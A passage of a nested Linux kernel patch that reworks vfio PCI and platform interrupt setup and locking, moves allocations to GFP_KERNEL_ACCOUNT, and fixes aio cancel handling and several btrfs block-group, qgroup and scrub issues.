++				kzalloc(sizeof(*dummy_res), GFP_KERNEL_ACCOUNT);
+ 			if (dummy_res == NULL)
+ 				goto no_mmap;
+ 
+@@ -856,7 +857,7 @@ int vfio_pci_core_register_dev_region(struct vfio_pci_core_device *vdev,
+ 
+ 	region = krealloc(vdev->region,
+ 			  (vdev->num_regions + 1) * sizeof(*region),
+-			  GFP_KERNEL);
++			  GFP_KERNEL_ACCOUNT);
+ 	if (!region)
+ 		return -ENOMEM;
+ 
+@@ -1637,7 +1638,7 @@ static int __vfio_pci_add_vma(struct vfio_pci_core_device *vdev,
+ {
+ 	struct vfio_pci_mmap_vma *mmap_vma;
+ 
+-	mmap_vma = kmalloc(sizeof(*mmap_vma), GFP_KERNEL);
++	mmap_vma = kmalloc(sizeof(*mmap_vma), GFP_KERNEL_ACCOUNT);
+ 	if (!mmap_vma)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/vfio/pci/vfio_pci_igd.c b/drivers/vfio/pci/vfio_pci_igd.c
+index 5e6ca59269548..dd70e2431bd74 100644
+--- a/drivers/vfio/pci/vfio_pci_igd.c
++++ b/drivers/vfio/pci/vfio_pci_igd.c
+@@ -180,7 +180,7 @@ static int vfio_pci_igd_opregion_init(struct vfio_pci_core_device *vdev)
+ 	if (!addr || !(~addr))
+ 		return -ENODEV;
+ 
+-	opregionvbt = kzalloc(sizeof(*opregionvbt), GFP_KERNEL);
++	opregionvbt = kzalloc(sizeof(*opregionvbt), GFP_KERNEL_ACCOUNT);
+ 	if (!opregionvbt)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/vfio/pci/vfio_pci_intrs.c b/drivers/vfio/pci/vfio_pci_intrs.c
+index 40c3d7cf163f6..03246a59b5536 100644
+--- a/drivers/vfio/pci/vfio_pci_intrs.c
++++ b/drivers/vfio/pci/vfio_pci_intrs.c
+@@ -55,17 +55,24 @@ static void vfio_send_intx_eventfd(void *opaque, void *unused)
+ {
+ 	struct vfio_pci_core_device *vdev = opaque;
+ 
+-	if (likely(is_intx(vdev) && !vdev->virq_disabled))
+-		eventfd_signal(vdev->ctx[0].trigger, 1);
++	if (likely(is_intx(vdev) && !vdev->virq_disabled)) {
++		struct eventfd_ctx *trigger;
++
++		trigger = READ_ONCE(vdev->ctx[0].trigger);
++		if (likely(trigger))
++			eventfd_signal(trigger, 1);
++	}
+ }
+ 
+ /* Returns true if the INTx vfio_pci_irq_ctx.masked value is changed. */
+-bool vfio_pci_intx_mask(struct vfio_pci_core_device *vdev)
++static bool __vfio_pci_intx_mask(struct vfio_pci_core_device *vdev)
+ {
+ 	struct pci_dev *pdev = vdev->pdev;
+ 	unsigned long flags;
+ 	bool masked_changed = false;
+ 
++	lockdep_assert_held(&vdev->igate);
++
+ 	spin_lock_irqsave(&vdev->irqlock, flags);
+ 
+ 	/*
+@@ -95,6 +102,17 @@ bool vfio_pci_intx_mask(struct vfio_pci_core_device *vdev)
+ 	return masked_changed;
+ }
+ 
++bool vfio_pci_intx_mask(struct vfio_pci_core_device *vdev)
++{
++	bool mask_changed;
++
++	mutex_lock(&vdev->igate);
++	mask_changed = __vfio_pci_intx_mask(vdev);
++	mutex_unlock(&vdev->igate);
++
++	return mask_changed;
++}
++
+ /*
+  * If this is triggered by an eventfd, we can't call eventfd_signal
+  * or else we'll deadlock on the eventfd wait queue.  Return >0 when
+@@ -137,12 +155,21 @@ static int vfio_pci_intx_unmask_handler(void *opaque, void *unused)
+ 	return ret;
+ }
+ 
+-void vfio_pci_intx_unmask(struct vfio_pci_core_device *vdev)
++static void __vfio_pci_intx_unmask(struct vfio_pci_core_device *vdev)
+ {
++	lockdep_assert_held(&vdev->igate);
++
+ 	if (vfio_pci_intx_unmask_handler(vdev, NULL) > 0)
+ 		vfio_send_intx_eventfd(vdev, NULL);
+ }
+ 
++void vfio_pci_intx_unmask(struct vfio_pci_core_device *vdev)
++{
++	mutex_lock(&vdev->igate);
++	__vfio_pci_intx_unmask(vdev);
++	mutex_unlock(&vdev->igate);
++}
++
+ static irqreturn_t vfio_intx_handler(int irq, void *dev_id)
+ {
+ 	struct vfio_pci_core_device *vdev = dev_id;
+@@ -169,95 +196,104 @@ static irqreturn_t vfio_intx_handler(int irq, void *dev_id)
+ 	return ret;
+ }
+ 
+-static int vfio_intx_enable(struct vfio_pci_core_device *vdev)
++static int vfio_intx_enable(struct vfio_pci_core_device *vdev,
++			    struct eventfd_ctx *trigger)
+ {
++	struct pci_dev *pdev = vdev->pdev;
++	unsigned long irqflags;
++	char *name;
++	int ret;
++
+ 	if (!is_irq_none(vdev))
+ 		return -EINVAL;
+ 
+-	if (!vdev->pdev->irq)
++	if (!pdev->irq)
+ 		return -ENODEV;
+ 
+-	vdev->ctx = kzalloc(sizeof(struct vfio_pci_irq_ctx), GFP_KERNEL);
++	name = kasprintf(GFP_KERNEL_ACCOUNT, "vfio-intx(%s)", pci_name(pdev));
++	if (!name)
++		return -ENOMEM;
++
++	vdev->ctx = kzalloc(sizeof(struct vfio_pci_irq_ctx), GFP_KERNEL_ACCOUNT);
+ 	if (!vdev->ctx)
+ 		return -ENOMEM;
+ 
+ 	vdev->num_ctx = 1;
+ 
++	vdev->ctx[0].name = name;
++	vdev->ctx[0].trigger = trigger;
++
+ 	/*
+-	 * If the virtual interrupt is masked, restore it.  Devices
+-	 * supporting DisINTx can be masked at the hardware level
+-	 * here, non-PCI-2.3 devices will have to wait until the
+-	 * interrupt is enabled.
++	 * Fill the initial masked state based on virq_disabled.  After
++	 * enable, changing the DisINTx bit in vconfig directly changes INTx
++	 * masking.  igate prevents races during setup, once running masked
++	 * is protected via irqlock.
++	 *
++	 * Devices supporting DisINTx also reflect the current mask state in
++	 * the physical DisINTx bit, which is not affected during IRQ setup.
++	 *
++	 * Devices without DisINTx support require an exclusive interrupt.
++	 * IRQ masking is performed at the IRQ chip.  Again, igate protects
++	 * against races during setup and IRQ handlers and irqfds are not
++	 * yet active, therefore masked is stable and can be used to
++	 * conditionally auto-enable the IRQ.
++	 *
++	 * irq_type must be stable while the IRQ handler is registered,
++	 * therefore it must be set before request_irq().
+ 	 */
+ 	vdev->ctx[0].masked = vdev->virq_disabled;
+-	if (vdev->pci_2_3)
+-		pci_intx(vdev->pdev, !vdev->ctx[0].masked);
++	if (vdev->pci_2_3) {
++		pci_intx(pdev, !vdev->ctx[0].masked);
++		irqflags = IRQF_SHARED;
++	} else {
++		irqflags = vdev->ctx[0].masked ? IRQF_NO_AUTOEN : 0;
++	}
+ 
+ 	vdev->irq_type = VFIO_PCI_INTX_IRQ_INDEX;
+ 
++	ret = request_irq(pdev->irq, vfio_intx_handler,
++			  irqflags, vdev->ctx[0].name, vdev);
++	if (ret) {
++		vdev->irq_type = VFIO_PCI_NUM_IRQS;
++		kfree(name);
++		vdev->num_ctx = 0;
++		kfree(vdev->ctx);
++		return ret;
++	}
++
+ 	return 0;
+ }
+ 
+-static int vfio_intx_set_signal(struct vfio_pci_core_device *vdev, int fd)
++static int vfio_intx_set_signal(struct vfio_pci_core_device *vdev,
++				struct eventfd_ctx *trigger)
+ {
+ 	struct pci_dev *pdev = vdev->pdev;
+-	unsigned long irqflags = IRQF_SHARED;
+-	struct eventfd_ctx *trigger;
+-	unsigned long flags;
+-	int ret;
++	struct eventfd_ctx *old;
+ 
+-	if (vdev->ctx[0].trigger) {
+-		free_irq(pdev->irq, vdev);
+-		kfree(vdev->ctx[0].name);
+-		eventfd_ctx_put(vdev->ctx[0].trigger);
+-		vdev->ctx[0].trigger = NULL;
+-	}
+-
+-	if (fd < 0) /* Disable only */
+-		return 0;
+-
+-	vdev->ctx[0].name = kasprintf(GFP_KERNEL, "vfio-intx(%s)",
+-				      pci_name(pdev));
+-	if (!vdev->ctx[0].name)
+-		return -ENOMEM;
++	old = vdev->ctx[0].trigger;
+ 
+-	trigger = eventfd_ctx_fdget(fd);
+-	if (IS_ERR(trigger)) {
+-		kfree(vdev->ctx[0].name);
+-		return PTR_ERR(trigger);
+-	}
++	WRITE_ONCE(vdev->ctx[0].trigger, trigger);
+ 
+-	vdev->ctx[0].trigger = trigger;
+-
+-	if (!vdev->pci_2_3)
+-		irqflags = 0;
+-
+-	ret = request_irq(pdev->irq, vfio_intx_handler,
+-			  irqflags, vdev->ctx[0].name, vdev);
+-	if (ret) {
+-		vdev->ctx[0].trigger = NULL;
+-		kfree(vdev->ctx[0].name);
+-		eventfd_ctx_put(trigger);
+-		return ret;
++	/* Releasing an old ctx requires synchronizing in-flight users */
++	if (old) {
++		synchronize_irq(pdev->irq);
++		vfio_virqfd_flush_thread(&vdev->ctx[0].unmask);
++		eventfd_ctx_put(old);
+ 	}
+ 
+-	/*
+-	 * INTx disable will stick across the new irq setup,
+-	 * disable_irq won't.
+-	 */
+-	spin_lock_irqsave(&vdev->irqlock, flags);
+-	if (!vdev->pci_2_3 && vdev->ctx[0].masked)
+-		disable_irq_nosync(pdev->irq);
+-	spin_unlock_irqrestore(&vdev->irqlock, flags);
+-
+ 	return 0;
+ }
+ 
+ static void vfio_intx_disable(struct vfio_pci_core_device *vdev)
+ {
++	struct pci_dev *pdev = vdev->pdev;
++
+ 	vfio_virqfd_disable(&vdev->ctx[0].unmask);
+ 	vfio_virqfd_disable(&vdev->ctx[0].mask);
+-	vfio_intx_set_signal(vdev, -1);
++	free_irq(pdev->irq, vdev);
++	if (vdev->ctx[0].trigger)
++		eventfd_ctx_put(vdev->ctx[0].trigger);
++	kfree(vdev->ctx[0].name);
+ 	vdev->irq_type = VFIO_PCI_NUM_IRQS;
+ 	vdev->num_ctx = 0;
+ 	kfree(vdev->ctx);
+@@ -284,7 +320,8 @@ static int vfio_msi_enable(struct vfio_pci_core_device *vdev, int nvec, bool msi
+ 	if (!is_irq_none(vdev))
+ 		return -EINVAL;
+ 
+-	vdev->ctx = kcalloc(nvec, sizeof(struct vfio_pci_irq_ctx), GFP_KERNEL);
++	vdev->ctx = kcalloc(nvec, sizeof(struct vfio_pci_irq_ctx),
++			    GFP_KERNEL_ACCOUNT);
+ 	if (!vdev->ctx)
+ 		return -ENOMEM;
+ 
+@@ -316,14 +353,14 @@ static int vfio_msi_enable(struct vfio_pci_core_device *vdev, int nvec, bool msi
+ }
+ 
+ static int vfio_msi_set_vector_signal(struct vfio_pci_core_device *vdev,
+-				      int vector, int fd, bool msix)
++				      unsigned int vector, int fd, bool msix)
+ {
+ 	struct pci_dev *pdev = vdev->pdev;
+ 	struct eventfd_ctx *trigger;
+ 	int irq, ret;
+ 	u16 cmd;
+ 
+-	if (vector < 0 || vector >= vdev->num_ctx)
++	if (vector >= vdev->num_ctx)
+ 		return -EINVAL;
+ 
+ 	irq = pci_irq_vector(pdev, vector);
+@@ -343,7 +380,8 @@ static int vfio_msi_set_vector_signal(struct vfio_pci_core_device *vdev,
+ 	if (fd < 0)
+ 		return 0;
+ 
+-	vdev->ctx[vector].name = kasprintf(GFP_KERNEL, "vfio-msi%s[%d](%s)",
++	vdev->ctx[vector].name = kasprintf(GFP_KERNEL_ACCOUNT,
++					   "vfio-msi%s[%d](%s)",
+ 					   msix ? "x" : "", vector,
+ 					   pci_name(pdev));
+ 	if (!vdev->ctx[vector].name)
+@@ -397,7 +435,8 @@ static int vfio_msi_set_vector_signal(struct vfio_pci_core_device *vdev,
+ static int vfio_msi_set_block(struct vfio_pci_core_device *vdev, unsigned start,
+ 			      unsigned count, int32_t *fds, bool msix)
+ {
+-	int i, j, ret = 0;
++	unsigned int i, j;
++	int ret = 0;
+ 
+ 	if (start >= vdev->num_ctx || start + count > vdev->num_ctx)
+ 		return -EINVAL;
+@@ -408,8 +447,8 @@ static int vfio_msi_set_block(struct vfio_pci_core_device *vdev, unsigned start,
+ 	}
+ 
+ 	if (ret) {
+-		for (--j; j >= (int)start; j--)
+-			vfio_msi_set_vector_signal(vdev, j, -1, msix);
++		for (i = start; i < j; i++)
++			vfio_msi_set_vector_signal(vdev, i, -1, msix);
+ 	}
+ 
+ 	return ret;
+@@ -418,16 +457,15 @@ static int vfio_msi_set_block(struct vfio_pci_core_device *vdev, unsigned start,
+ static void vfio_msi_disable(struct vfio_pci_core_device *vdev, bool msix)
+ {
+ 	struct pci_dev *pdev = vdev->pdev;
+-	int i;
++	unsigned int i;
+ 	u16 cmd;
+ 
+ 	for (i = 0; i < vdev->num_ctx; i++) {
+ 		vfio_virqfd_disable(&vdev->ctx[i].unmask);
+ 		vfio_virqfd_disable(&vdev->ctx[i].mask);
++		vfio_msi_set_vector_signal(vdev, i, -1, msix);
+ 	}
+ 
+-	vfio_msi_set_block(vdev, 0, vdev->num_ctx, NULL, msix);
+-
+ 	cmd = vfio_pci_memory_lock_and_enable(vdev);
+ 	pci_free_irq_vectors(pdev);
+ 	vfio_pci_memory_unlock_and_restore(vdev, cmd);
+@@ -455,11 +493,11 @@ static int vfio_pci_set_intx_unmask(struct vfio_pci_core_device *vdev,
+ 		return -EINVAL;
+ 
+ 	if (flags & VFIO_IRQ_SET_DATA_NONE) {
+-		vfio_pci_intx_unmask(vdev);
++		__vfio_pci_intx_unmask(vdev);
+ 	} else if (flags & VFIO_IRQ_SET_DATA_BOOL) {
+ 		uint8_t unmask = *(uint8_t *)data;
+ 		if (unmask)
+-			vfio_pci_intx_unmask(vdev);
++			__vfio_pci_intx_unmask(vdev);
+ 	} else if (flags & VFIO_IRQ_SET_DATA_EVENTFD) {
+ 		int32_t fd = *(int32_t *)data;
+ 		if (fd >= 0)
+@@ -482,11 +520,11 @@ static int vfio_pci_set_intx_mask(struct vfio_pci_core_device *vdev,
+ 		return -EINVAL;
+ 
+ 	if (flags & VFIO_IRQ_SET_DATA_NONE) {
+-		vfio_pci_intx_mask(vdev);
++		__vfio_pci_intx_mask(vdev);
+ 	} else if (flags & VFIO_IRQ_SET_DATA_BOOL) {
+ 		uint8_t mask = *(uint8_t *)data;
+ 		if (mask)
+-			vfio_pci_intx_mask(vdev);
++			__vfio_pci_intx_mask(vdev);
+ 	} else if (flags & VFIO_IRQ_SET_DATA_EVENTFD) {
+ 		return -ENOTTY; /* XXX implement me */
+ 	}
+@@ -507,19 +545,23 @@ static int vfio_pci_set_intx_trigger(struct vfio_pci_core_device *vdev,
+ 		return -EINVAL;
+ 
+ 	if (flags & VFIO_IRQ_SET_DATA_EVENTFD) {
++		struct eventfd_ctx *trigger = NULL;
+ 		int32_t fd = *(int32_t *)data;
+ 		int ret;
+ 
+-		if (is_intx(vdev))
+-			return vfio_intx_set_signal(vdev, fd);
++		if (fd >= 0) {
++			trigger = eventfd_ctx_fdget(fd);
++			if (IS_ERR(trigger))
++				return PTR_ERR(trigger);
++		}
+ 
+-		ret = vfio_intx_enable(vdev);
+-		if (ret)
+-			return ret;
++		if (is_intx(vdev))
++			ret = vfio_intx_set_signal(vdev, trigger);
++		else
++			ret = vfio_intx_enable(vdev, trigger);
+ 
+-		ret = vfio_intx_set_signal(vdev, fd);
+-		if (ret)
+-			vfio_intx_disable(vdev);
++		if (ret && trigger)
++			eventfd_ctx_put(trigger);
+ 
+ 		return ret;
+ 	}
+@@ -541,7 +583,7 @@ static int vfio_pci_set_msi_trigger(struct vfio_pci_core_device *vdev,
+ 				    unsigned index, unsigned start,
+ 				    unsigned count, uint32_t flags, void *data)
+ {
+-	int i;
++	unsigned int i;
+ 	bool msix = (index == VFIO_PCI_MSIX_IRQ_INDEX) ? true : false;
+ 
+ 	if (irq_is(vdev, index) && !count && (flags & VFIO_IRQ_SET_DATA_NONE)) {
+diff --git a/drivers/vfio/pci/vfio_pci_rdwr.c b/drivers/vfio/pci/vfio_pci_rdwr.c
+index e352a033b4aef..e27de61ac9fe7 100644
+--- a/drivers/vfio/pci/vfio_pci_rdwr.c
++++ b/drivers/vfio/pci/vfio_pci_rdwr.c
+@@ -470,7 +470,7 @@ int vfio_pci_ioeventfd(struct vfio_pci_core_device *vdev, loff_t offset,
+ 		goto out_unlock;
+ 	}
+ 
+-	ioeventfd = kzalloc(sizeof(*ioeventfd), GFP_KERNEL);
++	ioeventfd = kzalloc(sizeof(*ioeventfd), GFP_KERNEL_ACCOUNT);
+ 	if (!ioeventfd) {
+ 		ret = -ENOMEM;
+ 		goto out_unlock;
+diff --git a/drivers/vfio/platform/vfio_platform_irq.c b/drivers/vfio/platform/vfio_platform_irq.c
+index c5b09ec0a3c98..7f4341a8d7185 100644
+--- a/drivers/vfio/platform/vfio_platform_irq.c
++++ b/drivers/vfio/platform/vfio_platform_irq.c
+@@ -136,6 +136,16 @@ static int vfio_platform_set_irq_unmask(struct vfio_platform_device *vdev,
+ 	return 0;
+ }
+ 
++/*
++ * The trigger eventfd is guaranteed valid in the interrupt path
++ * and protected by the igate mutex when triggered via ioctl.
++ */
++static void vfio_send_eventfd(struct vfio_platform_irq *irq_ctx)
++{
++	if (likely(irq_ctx->trigger))
++		eventfd_signal(irq_ctx->trigger, 1);
++}
++
+ static irqreturn_t vfio_automasked_irq_handler(int irq, void *dev_id)
+ {
+ 	struct vfio_platform_irq *irq_ctx = dev_id;
+@@ -155,7 +165,7 @@ static irqreturn_t vfio_automasked_irq_handler(int irq, void *dev_id)
+ 	spin_unlock_irqrestore(&irq_ctx->lock, flags);
+ 
+ 	if (ret == IRQ_HANDLED)
+-		eventfd_signal(irq_ctx->trigger, 1);
++		vfio_send_eventfd(irq_ctx);
+ 
+ 	return ret;
+ }
+@@ -164,22 +174,19 @@ static irqreturn_t vfio_irq_handler(int irq, void *dev_id)
+ {
+ 	struct vfio_platform_irq *irq_ctx = dev_id;
+ 
+-	eventfd_signal(irq_ctx->trigger, 1);
++	vfio_send_eventfd(irq_ctx);
+ 
+ 	return IRQ_HANDLED;
+ }
+ 
+ static int vfio_set_trigger(struct vfio_platform_device *vdev, int index,
+-			    int fd, irq_handler_t handler)
++			    int fd)
+ {
+ 	struct vfio_platform_irq *irq = &vdev->irqs[index];
+ 	struct eventfd_ctx *trigger;
+-	int ret;
+ 
+ 	if (irq->trigger) {
+-		irq_clear_status_flags(irq->hwirq, IRQ_NOAUTOEN);
+-		free_irq(irq->hwirq, irq);
+-		kfree(irq->name);
++		disable_irq(irq->hwirq);
+ 		eventfd_ctx_put(irq->trigger);
+ 		irq->trigger = NULL;
+ 	}
+@@ -187,30 +194,20 @@ static int vfio_set_trigger(struct vfio_platform_device *vdev, int index,
+ 	if (fd < 0) /* Disable only */
+ 		return 0;
+ 
+-	irq->name = kasprintf(GFP_KERNEL, "vfio-irq[%d](%s)",
+-						irq->hwirq, vdev->name);
+-	if (!irq->name)
+-		return -ENOMEM;
+-
+ 	trigger = eventfd_ctx_fdget(fd);
+-	if (IS_ERR(trigger)) {
+-		kfree(irq->name);
++	if (IS_ERR(trigger))
+ 		return PTR_ERR(trigger);
+-	}
+ 
+ 	irq->trigger = trigger;
+ 
+-	irq_set_status_flags(irq->hwirq, IRQ_NOAUTOEN);
+-	ret = request_irq(irq->hwirq, handler, 0, irq->name, irq);
+-	if (ret) {
+-		kfree(irq->name);
+-		eventfd_ctx_put(trigger);
+-		irq->trigger = NULL;
+-		return ret;
+-	}
+-
+-	if (!irq->masked)
+-		enable_irq(irq->hwirq);
++	/*
++	 * irq->masked effectively provides nested disables within the overall
++	 * enable relative to trigger.  Specifically request_irq() is called
++	 * with NO_AUTOEN, therefore the IRQ is initially disabled.  The user
++	 * may only further disable the IRQ with a MASK operations because
++	 * irq->masked is initially false.
++	 */
++	enable_irq(irq->hwirq);
+ 
+ 	return 0;
+ }
+@@ -229,7 +226,7 @@ static int vfio_platform_set_irq_trigger(struct vfio_platform_device *vdev,
+ 		handler = vfio_irq_handler;
+ 
+ 	if (!count && (flags & VFIO_IRQ_SET_DATA_NONE))
+-		return vfio_set_trigger(vdev, index, -1, handler);
++		return vfio_set_trigger(vdev, index, -1);
+ 
+ 	if (start != 0 || count != 1)
+ 		return -EINVAL;
+@@ -237,7 +234,7 @@ static int vfio_platform_set_irq_trigger(struct vfio_platform_device *vdev,
+ 	if (flags & VFIO_IRQ_SET_DATA_EVENTFD) {
+ 		int32_t fd = *(int32_t *)data;
+ 
+-		return vfio_set_trigger(vdev, index, fd, handler);
++		return vfio_set_trigger(vdev, index, fd);
+ 	}
+ 
+ 	if (flags & VFIO_IRQ_SET_DATA_NONE) {
+@@ -261,6 +258,14 @@ int vfio_platform_set_irqs_ioctl(struct vfio_platform_device *vdev,
+ 		    unsigned start, unsigned count, uint32_t flags,
+ 		    void *data) = NULL;
+ 
++	/*
++	 * For compatibility, errors from request_irq() are local to the
++	 * SET_IRQS path and reflected in the name pointer.  This allows,
++	 * for example, polling mode fallback for an exclusive IRQ failure.
++	 */
++	if (IS_ERR(vdev->irqs[index].name))
++		return PTR_ERR(vdev->irqs[index].name);
++
+ 	switch (flags & VFIO_IRQ_SET_ACTION_TYPE_MASK) {
+ 	case VFIO_IRQ_SET_ACTION_MASK:
+ 		func = vfio_platform_set_irq_mask;
+@@ -281,7 +286,7 @@ int vfio_platform_set_irqs_ioctl(struct vfio_platform_device *vdev,
+ 
+ int vfio_platform_irq_init(struct vfio_platform_device *vdev)
+ {
+-	int cnt = 0, i;
++	int cnt = 0, i, ret = 0;
+ 
+ 	while (vdev->get_irq(vdev, cnt) >= 0)
+ 		cnt++;
+@@ -292,37 +297,70 @@ int vfio_platform_irq_init(struct vfio_platform_device *vdev)
+ 
+ 	for (i = 0; i < cnt; i++) {
+ 		int hwirq = vdev->get_irq(vdev, i);
++		irq_handler_t handler = vfio_irq_handler;
+ 
+-		if (hwirq < 0)
++		if (hwirq < 0) {
++			ret = -EINVAL;
+ 			goto err;
++		}
+ 
+ 		spin_lock_init(&vdev->irqs[i].lock);
+ 
+ 		vdev->irqs[i].flags = VFIO_IRQ_INFO_EVENTFD;
+ 
+-		if (irq_get_trigger_type(hwirq) & IRQ_TYPE_LEVEL_MASK)
++		if (irq_get_trigger_type(hwirq) & IRQ_TYPE_LEVEL_MASK) {
+ 			vdev->irqs[i].flags |= VFIO_IRQ_INFO_MASKABLE
+ 						| VFIO_IRQ_INFO_AUTOMASKED;
++			handler = vfio_automasked_irq_handler;
++		}
+ 
+ 		vdev->irqs[i].count = 1;
+ 		vdev->irqs[i].hwirq = hwirq;
+ 		vdev->irqs[i].masked = false;
++		vdev->irqs[i].name = kasprintf(GFP_KERNEL,
++					       "vfio-irq[%d](%s)", hwirq,
++					       vdev->name);
++		if (!vdev->irqs[i].name) {
++			ret = -ENOMEM;
++			goto err;
++		}
++
++		ret = request_irq(hwirq, handler, IRQF_NO_AUTOEN,
++				  vdev->irqs[i].name, &vdev->irqs[i]);
++		if (ret) {
++			kfree(vdev->irqs[i].name);
++			vdev->irqs[i].name = ERR_PTR(ret);
++		}
+ 	}
+ 
+ 	vdev->num_irqs = cnt;
+ 
+ 	return 0;
+ err:
++	for (--i; i >= 0; i--) {
++		if (!IS_ERR(vdev->irqs[i].name)) {
++			free_irq(vdev->irqs[i].hwirq, &vdev->irqs[i]);
++			kfree(vdev->irqs[i].name);
++		}
++	}
+ 	kfree(vdev->irqs);
+-	return -EINVAL;
++	return ret;
+ }
+ 
+ void vfio_platform_irq_cleanup(struct vfio_platform_device *vdev)
+ {
+ 	int i;
+ 
+-	for (i = 0; i < vdev->num_irqs; i++)
+-		vfio_set_trigger(vdev, i, -1, NULL);
++	for (i = 0; i < vdev->num_irqs; i++) {
++		vfio_virqfd_disable(&vdev->irqs[i].mask);
++		vfio_virqfd_disable(&vdev->irqs[i].unmask);
++		if (!IS_ERR(vdev->irqs[i].name)) {
++			free_irq(vdev->irqs[i].hwirq, &vdev->irqs[i]);
++			if (vdev->irqs[i].trigger)
++				eventfd_ctx_put(vdev->irqs[i].trigger);
++			kfree(vdev->irqs[i].name);
++		}
++	}
+ 
+ 	vdev->num_irqs = 0;
+ 	kfree(vdev->irqs);
+diff --git a/drivers/vfio/virqfd.c b/drivers/vfio/virqfd.c
+index 414e98d82b02e..e06b32ddedced 100644
+--- a/drivers/vfio/virqfd.c
++++ b/drivers/vfio/virqfd.c
+@@ -104,6 +104,13 @@ static void virqfd_inject(struct work_struct *work)
+ 		virqfd->thread(virqfd->opaque, virqfd->data);
+ }
+ 
++static void virqfd_flush_inject(struct work_struct *work)
++{
++	struct virqfd *virqfd = container_of(work, struct virqfd, flush_inject);
++
++	flush_work(&virqfd->inject);
++}
++
+ int vfio_virqfd_enable(void *opaque,
+ 		       int (*handler)(void *, void *),
+ 		       void (*thread)(void *, void *),
+@@ -115,7 +122,7 @@ int vfio_virqfd_enable(void *opaque,
+ 	int ret = 0;
+ 	__poll_t events;
+ 
+-	virqfd = kzalloc(sizeof(*virqfd), GFP_KERNEL);
++	virqfd = kzalloc(sizeof(*virqfd), GFP_KERNEL_ACCOUNT);
+ 	if (!virqfd)
+ 		return -ENOMEM;
+ 
+@@ -127,6 +134,7 @@ int vfio_virqfd_enable(void *opaque,
+ 
+ 	INIT_WORK(&virqfd->shutdown, virqfd_shutdown);
+ 	INIT_WORK(&virqfd->inject, virqfd_inject);
++	INIT_WORK(&virqfd->flush_inject, virqfd_flush_inject);
+ 
+ 	irqfd = fdget(fd);
+ 	if (!irqfd.file) {
+@@ -217,6 +225,19 @@ void vfio_virqfd_disable(struct virqfd **pvirqfd)
+ }
+ EXPORT_SYMBOL_GPL(vfio_virqfd_disable);
+ 
++void vfio_virqfd_flush_thread(struct virqfd **pvirqfd)
++{
++	unsigned long flags;
++
++	spin_lock_irqsave(&virqfd_lock, flags);
++	if (*pvirqfd && (*pvirqfd)->thread)
++		queue_work(vfio_irqfd_cleanup_wq, &(*pvirqfd)->flush_inject);
++	spin_unlock_irqrestore(&virqfd_lock, flags);
++
++	flush_workqueue(vfio_irqfd_cleanup_wq);
++}
++EXPORT_SYMBOL_GPL(vfio_virqfd_flush_thread);
++
+ module_init(vfio_virqfd_init);
+ module_exit(vfio_virqfd_exit);
+ 
+diff --git a/fs/aio.c b/fs/aio.c
+index 849c3e3ed558b..3e3bf6fdc5ab6 100644
+--- a/fs/aio.c
++++ b/fs/aio.c
+@@ -591,8 +591,8 @@ static int aio_setup_ring(struct kioctx *ctx, unsigned int nr_events)
+ 
+ void kiocb_set_cancel_fn(struct kiocb *iocb, kiocb_cancel_fn *cancel)
+ {
+-	struct aio_kiocb *req = container_of(iocb, struct aio_kiocb, rw);
+-	struct kioctx *ctx = req->ki_ctx;
++	struct aio_kiocb *req;
++	struct kioctx *ctx;
+ 	unsigned long flags;
+ 
+ 	/*
+@@ -602,9 +602,13 @@ void kiocb_set_cancel_fn(struct kiocb *iocb, kiocb_cancel_fn *cancel)
+ 	if (!(iocb->ki_flags & IOCB_AIO_RW))
+ 		return;
+ 
++	req = container_of(iocb, struct aio_kiocb, rw);
++
+ 	if (WARN_ON_ONCE(!list_empty(&req->ki_list)))
+ 		return;
+ 
++	ctx = req->ki_ctx;
++
+ 	spin_lock_irqsave(&ctx->ctx_lock, flags);
+ 	list_add_tail(&req->ki_list, &ctx->active_reqs);
+ 	req->ki_cancel = cancel;
+diff --git a/fs/btrfs/block-group.c b/fs/btrfs/block-group.c
+index 9f77565bd7f5a..5993b627be580 100644
+--- a/fs/btrfs/block-group.c
++++ b/fs/btrfs/block-group.c
+@@ -1413,7 +1413,8 @@ void btrfs_delete_unused_bgs(struct btrfs_fs_info *fs_info)
+ 		 * needing to allocate extents from the block group.
+ 		 */
+ 		used = btrfs_space_info_used(space_info, true);
+-		if (space_info->total_bytes - block_group->length < used) {
++		if (space_info->total_bytes - block_group->length < used &&
++		    block_group->zone_unusable < block_group->length) {
+ 			/*
+ 			 * Add a reference for the list, compensate for the ref
+ 			 * drop under the "next" label for the
+diff --git a/fs/btrfs/qgroup.c b/fs/btrfs/qgroup.c
+index b3472bf6b288f..c14d4f70e84bd 100644
+--- a/fs/btrfs/qgroup.c
++++ b/fs/btrfs/qgroup.c
+@@ -2800,11 +2800,6 @@ int btrfs_qgroup_account_extents(struct btrfs_trans_handle *trans)
+ 					goto cleanup;
+ 			}
+ 
+-			/* Free the reserved data space */
+-			btrfs_qgroup_free_refroot(fs_info,
+-					record->data_rsv_refroot,
+-					record->data_rsv,
+-					BTRFS_QGROUP_RSV_DATA);
+ 			/*
+ 			 * Use BTRFS_SEQ_LAST as time_seq to do special search,
+ 			 * which doesn't lock tree or delayed_refs and search
+@@ -2826,6 +2821,11 @@ int btrfs_qgroup_account_extents(struct btrfs_trans_handle *trans)
+ 			record->old_roots = NULL;
+ 			new_roots = NULL;
+ 		}
++		/* Free the reserved data space */
++		btrfs_qgroup_free_refroot(fs_info,
++				record->data_rsv_refroot,
++				record->data_rsv,
++				BTRFS_QGROUP_RSV_DATA);
+ cleanup:
+ 		ulist_free(record->old_roots);
+ 		ulist_free(new_roots);
+diff --git a/fs/btrfs/scrub.c b/fs/btrfs/scrub.c
+index 1672d4846baaf..12a2b1e3f1e35 100644
+--- a/fs/btrfs/scrub.c
++++ b/fs/btrfs/scrub.c
+@@ -4177,7 +4177,17 @@ static noinline_for_stack int scrub_supers(struct scrub_ctx *sctx,
+ 		gen = fs_info->last_trans_committed;
+ 
+ 	for (i = 0; i < BTRFS_SUPER_MIRROR_MAX; i++) {
+-		bytenr = btrfs_sb_offset(i);
++		ret = btrfs_sb_log_location(scrub_dev, i, 0, &bytenr);
++		if (ret == -ENOENT)
++			break;
++
++		if (ret) {
++			spin_lock(&sctx->stat_lock);
++			sctx->stat.super_errors++;
++			spin_unlock(&sctx->stat_lock);
++			continue;
++		}
++
+ 		if (bytenr + BTRFS_SUPER_INFO_SIZE >
+ 		    scrub_dev->commit_total_bytes)
+ 			break;
+diff --git a/fs/btrfs/volumes.c b/fs/btrfs/volumes.c
+index 6fc2d99270c18..03cfb425ea4ea 100644
+--- a/fs/btrfs/volumes.c
